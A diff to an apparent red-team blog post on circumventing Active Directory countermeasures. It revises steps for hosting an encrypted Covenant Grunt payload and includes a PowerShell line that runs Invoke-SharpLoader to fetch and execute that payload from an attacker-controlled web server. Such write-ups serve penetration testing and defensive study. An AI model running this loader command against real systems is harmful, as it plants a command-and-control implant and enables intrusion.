LuemmelSec/LuemmelSec.github.io/_posts/2021-01-16-Circumventing-Countermeasures-In-AD.md

     Host the encrypted file on our Covenant server under ```Listeners -> listener -> Hosted Files -> + Create```

-    Adapt the Invoke-SharpLoader script to have it directly run with our encrypted payload by adding this to the last line:
+    Adapt the Invoke-SharpLoader script to directly load our encrypted payload from the webserver by adding this to the last line:
-    ```
+    ```powershell
     Invoke-SharpLoader -location http://10.55.0.30/Grunt_SharpLoader.enc -password LuemmelSec -noArgs
     ```